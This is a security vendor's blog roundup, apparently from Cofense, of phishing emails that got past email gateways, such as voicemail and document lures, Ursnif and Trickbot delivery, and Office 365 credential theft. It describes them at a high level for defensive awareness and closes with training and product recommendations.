DESCRIPTION: This French phish – poisson? – pretends to be a number of missed calls. The link leads to a web form designed to steal credentials. Attackers leverage the simplicity of many voicemail notification emails, as Cofense has been reporting for over a year.

TYPE: Malware – Ursnif

DESCRIPTION: This Italian-language phish uses a tactic that is successful far too often – Microsoft Office documents (in this case Excel) that contain malicious macros. This sample delivered the Ursnif data stealer. Ursnif is hardly a newcomer to the phishing threat landscape, as Cofense has been reporting on it for years.

TYPE: Credential Theft

DESCRIPTION: Got documents? This phishing attempt claims to deliver an important PDF file but leads to a website designed to steal Office 365 credentials. Once these credentials are provided, the victim is redirected to a document hosted on Google Drive.

TYPE: Reconnaisance

DESCRIPTION: Information gathering is often a prelude to a cyberattack and this phish used a layered approach to perform reconnaissance on the target. Using an embedded URL, the victim is lured into downloading an archive containing a VBScript (.vbs). This script then attempts to download a PowerShell script that will gather information about the infected endpoint and environment.

TYPE: Credential Theft

DESCRIPTION: With a smorgasbord of foreign language-themed attacks in this week’s catch, this Swedish phish delivers an embedded URL that leads the victim to a Microsoft OneNote-hosted page designed to steal Office 365 credentials. Once provided, the victim is redirected to a document hosted on docdroid. Attackers leveraging Microsoft infrastructure to host malicious OneNote documents is nothing new.

TYPE: Credential Theft

DESCRIPTION: Here’s another example of voicemail spoofing. This one leads to a website designed to steal Office 365 credentials and then direct the victim to office.com. Simple. Effective.

TYPE: Malware – Trickbot

DESCRIPTION: While many of us like to enjoy a cup of java in the morning, this phishing attack uses Java shortcut files – .jnlp – that pull down a Java Archive (.jar) which then downloads and runs the Trickbot trojan. Hardly something you’d like to wake up to.

TYPE: Credential Theft

DESCRIPTION: This Coronavirus-themed phish promises a survey designed to steal corporate credentials. The malicious survey is hosted on Microsoft infrastructure – SharePoint – and exfiltrates the credentials using the legitimate SubmitSurveyData Microsoft URL. Survey phish is hardly a new tactic.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.